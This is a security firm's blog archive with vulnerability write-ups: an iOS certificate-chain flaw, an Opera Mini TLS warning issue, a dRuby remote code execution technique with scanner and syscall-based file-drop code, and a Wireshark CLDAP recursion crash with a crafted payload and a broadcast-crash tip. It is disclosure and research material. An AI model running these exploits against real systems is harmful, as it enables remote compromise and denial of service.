Wed Jan 25 14:38:20 CET 2017

Get well soon, FX

This post was written to update you on the current situation of our dear friend
and CEO Felix 'FX' Lindner. It will be used to keep you updated on FX's
progress. Please understand that updates won’t happen regularly.

Some of you already heard the news, but some haven’t. To cut the sad story of a
long journey short: FX suffered from cerebral bleeding (aneurysm) in early July
2016. He underwent several surgeries, which thankfully all went well –
considering the circumstances. Unfortunately, FX has been under medical
supervision ever since. Just recently, he was moved from medical care to a
specialized rehabilitation institution, where his health situation will
hopefully improve even further. The journey to a full recovery is still ahead
of him and will take an indefinite amount of time. Be assured that his family
and everyone at Recurity Labs support him to make sure that he receives the
best treatment imaginable.

If you feel like sending encouraging words to FX, his family, or even us,
please write to us. Please note that all messages will be read and filtered by
the responsible people at Recurity Labs and forwarded as we see fit. FX's
family made this a requirement in order to enable us to responsibly channel
such messages depending on FX's state of health. However, no message will be
left unread or deleted without at least passing your name and wishes along.

We want to thank you for your discretion during the last half year, for your
respectful manner, and for the sympathy you conveyed electronically, verbally,
and in various other ways. But most importantly, we wish FX a fast and full
recovery!

All the best and thank you,

FX's family and the team at Recurity Labs

Posted by The Recurity Labs Team | Permanent link

Wed Feb 1 20:07:04 CET 2012

Cisco Incident Response (CIR) 1.1 Open Source Release

Recurity Labs created a system for the inspection of Cisco legacy IOS memory dumps back in 2008. The tool, called Cisco Incident Response (CIR), was meant to identify successful and unsuccessful binary exploitation attempts against Cisco routers running IOS 11.x and 12.x. IOS 15.x is now available, but it doesn't differ much from the previous releases in terms of internal design.

We ran an online service for uploading and analyzing IOS images together with core dumps generated from them. The service has been used by various people, but not a single core dump contained indications of an actual binary exploit against the platform. It seems that it's simply too easy to pwn a company by traditional means: browser, Flash, Java, EXE attachments in email, social engineering, or cloud services.

To support nostalgic hobbyists concerning themselves with the same questions half a decade later, we decided to publish the source code of CIR today, allowing anyone to use it and inspect its inner workings. We believe that Kerckhoffs's principle also holds true for defense and detection systems, and it is instructive to look at code bases that have been tested in production for quite some time.

The code is interesting beyond the embedded knowledge about Cisco IOS data structures. Here are a couple of points for the inclined reader:

  • 23k lines of completely managed .NET code (C#)
  • A plug-in based knowledge system, where every plug-in consumes and provides some type of abstracted information about the subject, formulated as .NET types
  • Several lists with differing offsets between IOS minor versions and service releases, for those assuming that IOS data structures will always look the same between e.g. 12.4.3 and 12.4.3J
  • An ELF file format parser that could be useful in other projects
  • Report generation and a daemon mode, allowing CIR to be used in corporate and provider networks automatically

The code is released under GPLv3. We also provide a binary distribution for those who simply want to use it.
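The plug-in based knowledge system can be illustrated with a toy resolver. This is only a sketch in Ruby rather than CIR's actual C#, and the plug-in names and fact types are invented; the point is the dependency-driven scheduling, where each plug-in runs once the fact types it consumes are available:

```ruby
# Toy model of a plug-in knowledge system: each plug-in declares which
# fact types it consumes and provides, and a resolver runs the plug-ins
# in dependency order. All names here are invented for illustration.
Plugin = Struct.new(:name, :consumes, :provides, :run)

def run_plugins(plugins, facts = {})
  pending = plugins.dup
  until pending.empty?
    # a plug-in is runnable once all consumed fact types are present
    runnable = pending.select { |p| p.consumes.all? { |t| facts.key?(t) } }
    raise 'unsatisfiable dependencies' if runnable.empty?
    runnable.each do |p|
      facts[p.provides] = p.run.call(facts)
      pending.delete(p)
    end
  end
  facts
end

plugins = [
  Plugin.new('HeapWalker', [:elf_image], :heap_blocks,
             ->(f) { "blocks(#{f[:elf_image]})" }),
  Plugin.new('ElfLoader',  [],           :elf_image,
             ->(_) { 'image' }),
]
p run_plugins(plugins)  # ElfLoader runs first, then HeapWalker
```

Expressing the inter-plug-in contracts as types (here, fact keys) is what lets such a system stay extensible: a new analysis plug-in only declares what it needs and what it yields.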

Posted by FX | Permanent link

Tue Aug 9 18:34:11 CEST 2011

CVE-2011-0228 and the Opera Mini UI-Design

Recurity Labs received user reports, confirmed by our own tests, that Opera Mini is affected by the CVE-2011-0228 X.509 certificate validation issue, originally reported for Apple iOS.

Upon filing a bug with Opera Software (ID SKIRNE-136848), we tried to contact them directly. With some external help, we managed to get in contact with security people at Opera and received the following interesting statement:

Thanks for reporting an issue with Opera.

While you are correct that Opera Mini does not display a certificate
warning about chains with unknown Root certificates, there is, however,
a significant difference between what happened in iOS and what happens
in Opera Mini. Opera Mini will not indicate that such pages are secure,
that is, no padlock or similar indication is displayed for the web site
affected by this, giving the same security indications as it would for
an unencrypted site, which is the same as would have been displayed if
the user manually accepted the certificate.

Not showing a dialog was a design decision by the Opera Mini team, due
to the transcoder architecture of Opera Mini, and in part the
complexity of having the transcoder (proxy) server display a dialog at
the device and the obtain the result before continuing.

For more about Opera Mini security see

Reviewing the provided FAQ URL, we can learn that Opera Mini will show a padlock (at the top right corner) if the connection to the web site was secured. No padlock is shown for unsecured sites using HTTP.
When testing Opera Mini against a site with a broken certificate chain, no padlock is shown. However, the URL in the address bar still says https:// with no indication that anything might be wrong with that. Judging from the user feedback we received, it is not clear to users that the absence of the padlock means that certificate validation failed.
In our emulation environment, we also discovered that on small-screen devices, the padlock might not even be on-screen when loading a site.

Opera could easily display the failed certificate verification using means other than dialog boxes, e.g. a red background in the address bar, similar to Internet Explorer.
Given the current approach, we recommend not using Opera Mini for anything requiring a secure connection to a web site, especially considering that Opera Mini does not provide end-to-end encryption in any case.

Posted by FX | Permanent link

Tue Jul 26 22:25:23 CEST 2011

CVE-2011-0228 iOS certificate chain validation issue in handling of X.509 certificates

Recurity Labs recently conducted a project for the German Federal Office for Information Security (BSI), which (amongst others) also concerned the iOS platform. During the analysis, a severe vulnerability in the iOS X.509 implementation was identified. When validating certificate chains, iOS fails to properly check the X.509v3 extensions of the certificates in the chain. In particular, the "Basic Constraints" section of the supplied certificates is not verified by iOS. In the Basic Constraints section, the issuer of a certificate can encode whether or not the issued certificate is a CA certificate, i.e. whether or not it may be used to sign other certificates. Not checking the CA bit of a certificate basically means that every end-entity certificate can be used to sign further certificates.

To provide an example: When a CA issues a certificate to a Web site, the CA will usually set the CA bit of this certificate to false. Assume the attacker has such a certificate, issued by a trusted CA to a Web site under their control. The attacker can now use their private key to sign another certificate, which may contain arbitrary data. This could for instance be a certificate for any other domain, or, even worse, a certificate containing multiple common names: *.*, *.*.*, ... iOS fails to check whether the attacker's certificate was actually allowed to sign subsequent certificates and considers the universal certificate created this way as valid. The attacker could now use this certificate to intercept all SSL/TLS traffic originating from an iOS device.

However, SSL/TLS is not the only use of X.509. Every application that makes use of the iOS crypto framework to validate chains of X.509 certificates is vulnerable.
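To illustrate, here is a sketch (using Ruby's OpenSSL bindings; all names are invented) of the chain described above, and of what a correct validator does with it: the chain is rejected, because the intermediate certificate lacks the CA bit. A vulnerable validator such as the affected iOS versions would accept it.

```ruby
require 'openssl'

# Build a minimal certificate: subject, optional issuer, and a
# basicConstraints extension carrying the CA bit.
def make_cert(subject, issuer_cert, issuer_key, key, ca:)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2                      # X.509v3
  cert.serial = rand(1 << 31)
  cert.subject = OpenSSL::X509::Name.parse(subject)
  cert.issuer = issuer_cert ? issuer_cert.subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 3600
  cert.not_after = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = issuer_cert || cert
  cert.add_extension(
    ef.create_extension('basicConstraints', ca ? 'CA:TRUE' : 'CA:FALSE', true))
  cert.sign(issuer_key || key, OpenSSL::Digest.new('SHA256'))
  cert
end

root_key = OpenSSL::PKey::RSA.new(2048)
root = make_cert('/CN=Trusted Root', nil, nil, root_key, ca: true)

# Legitimate end-entity certificate: CA bit set to false.
site_key = OpenSSL::PKey::RSA.new(2048)
site = make_cert('/CN=www.example.com', root, root_key, site_key, ca: false)

# "Universal" certificate signed with the end-entity key.
evil_key = OpenSSL::PKey::RSA.new(2048)
evil = make_cert('/CN=*', site, site_key, evil_key, ca: false)

store = OpenSSL::X509::Store.new
store.add_cert(root)
puts store.verify(evil, [site])  # => false (invalid CA in chain)
```

A correct implementation fails the chain exactly because `site` carries `CA:FALSE`; skipping that check is the whole bug.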

The idea that Apple could have made an 8-year-old mistake was suggested by Bernhard 'bruhns' Brehm.

To test whether your iOS version is vulnerable, Recurity Labs has set up a Web site: If the Safari browser on your iDevice allows you to visit this site without issuing a warning, your device is vulnerable. The certificate for this site was created using the above described technique. Please feel free to validate this by inspecting the certificate that the HTTP server supplies to you.

Posted by Greg | Permanent link

Thu May 12 18:06:51 CEST 2011

dRuby for Penetration Testers

I somehow like Ruby, a nice and shiny programming language. At some point last year, I decided to have a closer look at 'Distributed Ruby' (also called dRuby). dRuby is all about easily usable objects and method invocations over the network.

So, without further ado, let's drop into some simple dRuby server code:

01  require 'drb/drb'
02  URI="druby://localhost:8787"
03  class TimeServer
04    def get_current_time
05      return Time.now
06    end
07  end
08  FRONT_OBJECT=TimeServer.new
09  $SAFE = 1 # disable eval() and friends
10  DRb.start_service(URI, FRONT_OBJECT)
11  DRb.thread.join

Lines 03 to 07 define a class TimeServer with the method get_current_time. All the magic happens in line 10, where the dRuby service is started with an instance of TimeServer as the exposed object. You'll probably have noticed line 09, where it says $SAFE = 1. This nifty variable turns on tainting and should prevent you from calling arbitrary code on the server side (that's basically what the documentation says). No worries, we'll come back to circumventing $SAFE later.

But first, let's look at the client side. Using this service would be as simple as:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 timeserver = DRbObject.new_with_uri(SERVER_URI)
05 puts timeserver.get_current_time

So here, after starting the dRuby service in line 03 and getting a remote object in line 04, we can simply call methods of that object over the wire, which is done in line 05. That's all that's needed for a dRuby client.

Now let's start building a more useful client: namely, a scanner that checks whether $SAFE is set.

01 #!/usr/bin/ruby
02 require 'drb/drb'
03
04 # The URI to connect to
05 SERVER_URI = "druby://localhost:8787"
06
07 DRb.start_service
08 undef :instance_eval
09 t = DRbObject.new_with_uri(SERVER_URI)
10
11 begin
12   a = t.instance_eval("`id`")
13   puts "[*] eval is enabled - you are:"
14   puts a
15 rescue SecurityError => e
16   puts "[*] sorry, eval is disabled"
17 rescue => e
18   puts "[*] likely not a druby port"
19 end

This scanner remotely checks whether the developer forgot to set $SAFE. If so, it will tell you the ID of the user running the dRuby service. Of course, you are free to alter it to do more fun stuff with the server, or you could just use the respective Metasploit module.

But now, back from the shiny Ruby world to some bug hunting. So: what could possibly go wrong when pushing serialized objects back and forth on the wire?

My first attempts of poking around in dRuby with $SAFE set were as follows:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 t = DRbObject.new_with_uri(SERVER_URI)
05 t.eval("`id`")

Here in line 05 I tried to call eval on the remote object. Unfortunately this resulted in the following error:

NoMethodError: private method `eval' called for #<TimeServer:0xb7821a88>:TimeServer

While playing around further with dRuby and digging deeper into the source, I found the following piece of code in drb/drb.rb:

    # List of insecure methods.
    # These methods are not callable via dRuby.
    INSECURE_METHOD = [:__send__]

Here, __send__ is blacklisted from being called via dRuby. However, and unfortunately, there is also a plain send method, as described in the Ruby documentation:

obj.send(symbol [, args...]) -> obj
obj.__send__(symbol [, args...]) -> obj

Invokes the method identified by symbol, passing it any arguments specified. 
You can use __send__ if the name send clashes with an existing method in obj. 

This very send method should give us the ability to call private methods on the object as follows:

t.send(:eval, "`id`")

This somehow worked, but we ran into another error:

SecurityError: Insecure operation - eval

I tried various functions taken from the class Object and the Kernel module, but all interesting functions were caught by a SecurityError. Wait a minute, really all of them? No, one little function was still willing to execute, and that function is syscall. So basically, we get free remote syscalls on the server side. When I reported this to the dRuby author, it turned out that tainting (which causes the SecurityError) had simply been forgotten for syscall.

In order to exploit this issue properly, we need a rather simple combination of syscalls to gain arbitrary command execution:

  • open() or creat() a file with permissions 777
  • write() some Ruby code to it
  • close() the file
  • fork() so that the dRuby service keeps running
  • execve() the just created file

This nice combo of syscalls is implemented in the Metasploit module as well. Alors, go out and play with it :)
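The combo above can be sketched as a short Ruby helper. This is a hedged illustration, not the Metasploit module itself: the syscall numbers are the 32-bit Linux (i386) ones, the path and payload are invented, and a small recorder double stands in for a live DRbObject handle so the call sequence can be shown without a real target.

```ruby
# 32-bit Linux (i386) syscall numbers - an assumption for this sketch;
# 64-bit targets use different numbers.
SYS_CREAT, SYS_WRITE, SYS_CLOSE, SYS_FORK, SYS_EXECVE = 8, 4, 6, 2, 11

def drop_and_exec(remote, path, code)
  fd = remote.send(:syscall, SYS_CREAT, path, 0777)   # create a mode-777 file
  remote.send(:syscall, SYS_WRITE, fd, code, code.size)
  remote.send(:syscall, SYS_CLOSE, fd)
  remote.send(:syscall, SYS_FORK)                     # keep the dRuby service running
  remote.send(:syscall, SYS_EXECVE, path)             # execute the dropped file
end

# Recorder double instead of a live DRbObject: logs each remote call.
class Recorder
  attr_reader :calls
  def initialize; @calls = []; end
  def send(name, *args)          # overrides Object#send to log the call
    @calls << [name, args.first]
    3                            # pretend the syscall returned fd 3
  end
end

r = Recorder.new
drop_and_exec(r, '/tmp/payload.rb', "system('id')")
p r.calls.map(&:last)  # => [8, 4, 6, 2, 11]
```

Against a real target, `remote` would be the DRbObject from the scanner above, and each `send(:syscall, ...)` executes on the server side.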

If you take a closer look at the Metasploit module, you'll see a neat little trick I came up with: when connecting, it is initially impossible to tell whether the target is a 32-bit or a 64-bit system, and the syscall numbers differ between those two flavors of Linux. So I chose syscall 20, which is getpid() on 32-bit systems but writev() on 64-bit systems. When we issue this syscall with no arguments, it succeeds on 32-bit systems; on 64-bit systems, it raises an error due to the missing arguments. We can then catch this error and switch to our 64-bit syscall numbers.
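The detection trick can be sketched as follows. Again this is an illustration, not the module's code: two fake remote objects stand in for 32-bit and 64-bit targets, simulating getpid() succeeding without arguments versus writev() raising.

```ruby
SYS_DUAL = 20  # getpid() on 32-bit Linux, writev() on 64-bit Linux

def detect_bits(remote)
  remote.send(:syscall, SYS_DUAL)  # getpid() needs no arguments
  32
rescue StandardError
  64                               # writev() without arguments raises
end

# Fake remotes simulating the two target flavors (illustration only):
linux32 = Object.new
def linux32.send(_name, *_args); 4242; end                 # getpid() succeeds
linux64 = Object.new
def linux64.send(_name, *_args); raise ArgumentError; end  # writev() blows up

p detect_bits(linux32)  # => 32
p detect_bits(linux64)  # => 64
```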

Thanks at this point go out to two Metasploit guys: bannedit who poked me to put together an all-in-one exploit, and egypt who improved the instance_eval payload.

Last but not least, a short disclaimer: both aforementioned modules might not work as expected on different Ruby versions, as some of these have been patched (by turning on tainting), and some won't have syscall implemented at all. The exploit has been tested and found to work with the following versions of Ruby: Ruby 1.8.7 patchlevel 249, Ruby 1.9.0, and Ruby 1.9.1 patchlevel 378 (all running on 32-bit Linux systems). Tested as well and found vulnerable was the 64-bit version on Ubuntu 10.10, with both the ruby1.8 and ruby1.9 packages.

Posted by Joern | Permanent link

Wed Mar 9 18:34:04 CET 2011

At least, I got DoS

On January 11th, a new version of Wireshark was released. The release contained several security-relevant fixes. Inspired by this fact, on a rainy evening I decided to have a closer look. 'There must be a bit more of that', I thought.

So I fired up my browser and helped myself to the latest Wireshark source code (which was version 1.4.3 at that point in time). After unpacking it, I went straight to the dissectors, which reside in the source directory under epan/dissectors (that I knew from reading the advisories for the bugs fixed in 1.4.3).

Due to Wireshark having more than 1,000 different packet dissectors in this directory, I chose a pretty dumb approach to find interesting code parts:

/wireshark-1.4.3/epan/dissectors$ grep -Hrn memcpy packet-* | less
- a command that yields 553 results. So I scrolled through that list for a bit and finally decided to take a closer look at packet-ldap.c, containing the following tvb_memcpy call:
packet-ldap.c:4020:    tvb_memcpy(tvb, str, offset, len);
The corresponding function is:
int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)

- which can be found in line 3974 of packet-ldap.c.

The reason why I grepped for memcpy was that I hoped to find some code where memcpy is used in a way that introduces a buffer overflow.

I quickly checked what the tvb_memcpy function does. It is defined in /epan/tvbuff.c and, as I suspected, it's a wrapper around good old memcpy which copies exactly len bytes from the packet buffer at offset to str.

But now let's have a look at the function body:

01 int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)
02 {
03  guint8 len;

04  len=tvb_get_guint8(tvb, offset);
05  offset+=1;
06  *str=0;
07  attributedesc_string=NULL;

08  while(len){
09    /* add potential field separation dot */
10    if(prepend_dot){
11      if(!maxlen){
12        *str=0;
13        return offset;
14      }
15      maxlen--;
16      *str++='.';
17      *str=0;
18    }

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

29    prepend_dot=TRUE;

30    if(maxlen<=len){
31      if(maxlen>3){
32        *str++='.';
33        *str++='.';
34        *str++='.';
35      }
36      *str=0;
37      return offset; /* will mess up offset in caller, is unlikely */
38    }
39    tvb_memcpy(tvb, str, offset, len);
40    str+=len;
41    *str=0;
42    maxlen-=len;
43    offset+=len;

44    len=tvb_get_guint8(tvb, offset);
45    offset+=1;
46  }
47  *str=0;
48  return offset;
49 }

The part I grepped for can be found on line 39, where tvb_memcpy copies from the tvb buffer into str. The tvb buffer holds the packet data that came across the wire. At this point, my question was:

Can we overflow str in this function?

Unfortunately, it turns out we can't. First I checked all calls to this function: all of them came with a 256-byte char buffer and maxlen set to 255. The part of the packet at offset is a length field followed by a string of that length. The length len, which is read as an 8-bit value from the tvb buffer in line 04, cannot be greater than 255. And a proper check for maxlen (sized sufficiently) is performed in line 30.

Now you may ask, 'WhyTF does he bore me with non-exploitable code?!' Well, as the title already suggests - at least, I got DoS.

On line 19, a special case is handled, namely compressed strings. A length byte of 0xc0 denotes that what follows is not a string of length 0xc0, but rather an offset into the packet referencing another string. This concept was familiar to me, as it's used in DNS as well. Not so surprisingly, there have been issues in DNS-handling code regarding those compressed strings.

Such compressed strings look like this, for instance: we have string1, 'recurity.com', at offset 0x23; plus we have another string2, 'foo.recurity.com', at another offset. This string2 can be compressed to '\x03foo\xc0\x23' - so now string2 contains the length of 'foo' (\x03) and a reference to the offset which contains '\x08recurity\x03com'.

Let's read that part again:

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

As you can see, in line 26 there's a recursive call to dissect_mscldap_string. And in line 23, the offset is checked for not pointing to itself, because this would cause an infinite recursion. But, wait a minute - what if...

   +--------+   +--------+
   | label1 |   | label2 |
   +--------+   +--------+
     \__^_________^ /

...there was a label1 pointing to a label2, with that label2 pointing to label1 again?!

With this wee little trick we'd pass the self-reference check, but also gain infinite recursion, as both strings reference each other.
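The string walk and the loop can be sketched in a few lines of Ruby. This is a toy re-implementation of the dissector's logic, not Wireshark's C code; the recursion-depth guard is exactly the kind of protection the vulnerable version lacked, so here the loop raises instead of recursing forever.

```ruby
# Toy decoder for the compressed-string scheme: a length byte, the label
# bytes, and 0xc0 introducing a one-byte offset to another string.
def decode(buf, off, depth = 0)
  raise 'compression loop' if depth > 10   # guard the vulnerable code lacked
  labels = []
  loop do
    len = buf.getbyte(off); off += 1
    break if len.nil? || len == 0
    if len == 0xc0                         # compressed: next byte is an offset
      labels << decode(buf, buf.getbyte(off), depth + 1)
      return labels.join('.')
    end
    labels << buf[off, len]; off += len
  end
  labels.join('.')
end

# 'recurity.com' at offset 0x18, 'foo' plus a back-reference at 0x28:
buf = "\x00".b * 0x30
buf[0x18, 14] = "\x08recurity\x03com\x00".b
buf[0x28, 6]  = "\x03foo\xc0\x18".b
p decode(buf, 0x28)   # => "foo.recurity.com"

# Two labels pointing at each other: passes the self-reference check,
# but loops forever in the vulnerable dissector.
evil = "\x00".b * 0x10
evil[0x04, 2] = "\xc0\x06".b
evil[0x06, 2] = "\xc0\x04".b
begin
  decode(evil, 0x04)
rescue RuntimeError => e
  puts e.message      # => compression loop
end
```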

I decided I definitely wanted a PoC for this bug. Even if it's 'just a DoS', it might be entertaining enough to crash other folks' Wireshark ;) Developing the PoC was pretty straightforward. Again I chose kind of a lazy approach: since the code handles Connectionless LDAP (hence CLDAP), I searched the Internet for a bit and found a fancy site where I grabbed the file 'samba4-join-rtl8139.pcap', containing some CLDAP packets. Wireshark happily dissected the CLDAP packets, especially the netlogon response.

The netlogon response contains a string reference to the very first string, labeled 'Forest', at offset 0x18. So I dumped the whole UDP payload of that packet and pasted it into scapy. Then I replaced the 'Forest' string with a reference to offset 0x1A, directly followed by a reference back to 0x18. In scapy, it'd look like this:

\xf9\x60\xb4" + "\xc0" + "\x1a"  +  "\xc0" + "\x18" +  "\x0e\x63\x6f\x6e\x74\x61\x63\x74\x2d\x73\x61\x6d\x62\x61\x34\xc0\x18\x0a

This did the job just right - Wireshark silently crashed when sniffing on the loopback device.

This issue has been fixed in Wireshark version 1.4.4. Additionally, I wrote a ready-to-use Metasploit module which is available via msfupdate. The usage is quite simple:

msf > use auxiliary/dos/wireshark/cldap 
msf auxiliary(cldap) >show options

Module options (auxiliary/dos/wireshark/cldap):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  389              yes       The destination port
   SHOST                   no        This option can be used to specify a spoofed source address

msf auxiliary(cldap) > set RHOST
msf auxiliary(cldap) > run 

Pro-tip: use the local network's broadcast address as RHOST to crash all vulnerable Wiresharks running in your network segment :).

Posted by Joern | Permanent link

Thu May 27 14:43:26 CEST 2010

Jail-breaking the Cisco Unified Communication Manager (CUCM)

We have a long and very good relationship with the Cisco PSIRT team, reporting vulnerabilities to them and patiently waiting until fixes are provided. But some things we simply don't consider to be vulnerabilities in the typical sense of the word. This includes artifacts of product behavior that allow you to get the type of access to the product that you would expect.

The reasoning is that you already have to have a legitimate operating system administrator account on the CUCM, in order to "escalate" your privileges to a remote root shell. That the legitimate operating system administrator account, as provided by the product, isn't actually root, doesn't change the privilege situation one bit. Also, other people have published other guides (e.g. this one) before.

Therefore, we have decided to publish an article on how to gain the access you may want.

Please use this information only on lab systems or virtual installations. It is not recommended to root any actual Cisco appliance and will most likely void your warranty.

Posted by FX | Permanent link

Wed May 26 17:53:44 CEST 2010

Carnival of the Cultures 2010

A great team needs a good environment to work in, and the environment doesn't stop at the office door. The cultural space in which you live also plays an important role and influences how people think and work. Berlin, home to Recurity Labs, luckily provides a rich and multifarious culture, which all of us enjoy a lot. Therefore, we occasionally want to give back to that environment, doing our little part to make it blossom some more.

For this year's Carnival of the Cultures, a multicultural street parade, we had the opportunity to support [multi:mat] and our long-time DJ friends from Dangerous Drums in getting their float onto the parade.

Our motto for this float: Work hard - Party harder!

We would like to thank [multi:mat] and Dangerous Drums for making this all possible, and of course the hundreds of thousands of people who participated in the parade.

Posted by FX | Permanent link | File under: events

Fri Mar 5 12:39:20 CET 2010

Guest Blogger at Microsoft BlueHat Blog

The Microsoft BlueHat team invited me to publish a rant on their BlueHat blog on TechNet. Of course, I had to deliver: Parser Central: Microsoft .NET as a Security Component

Posted by FX | Permanent link | File under: rants

Thu Jan 29 19:15:02 CET 2009

Corporate Responsibility

During a non-public security event, I saw a presentation by Olaf Kolkman about the new DNS server named Unbound. When he mentioned that the whole thing is written in C for performance reasons, I countered that we should simply stop developing production software in languages that produce unmanaged code. We got into quite some discussions with the whole audience after that, with many people stating that there is no alternative and everything else is just too slow. I'm not buying this, for many obvious reasons, but that's for another post.

To put our abilities where my mouth is, we ended up performing a short source code audit for the Unbound developers. After all, Unbound is an effort to produce a reliable, validating, and DNSSEC-ready name server, something we all want to see deployed on a larger scale. Sergio Alvarez, who by the way will be speaking at CanSecWest this year, looked at the code and found it surprisingly not riddled with remote code execution bugs. I was certainly happy about that, because it meant the next-generation DNS server deployments wouldn't face a future comparable to ISC BIND's past.

That impression, however, was largely due to Sergio compiling the code with all the ASSERT statements intact. Now, people running heavy-duty production DNS servers will most certainly try to make them as fast as possible, instructing the compiler to get rid of "debug" features like ASSERTs. That might not be a good idea. So here is another lesson learned: when building for production, you might want to keep those ASSERTs compiled in, since your server crashing on funny packets is probably better than sharing administrative control of the machine.

Other than that, I hope the Unbound team keeps up the good work, so people have one less excuse to not move to DNSSEC.

Posted by FX | Permanent link | File under: events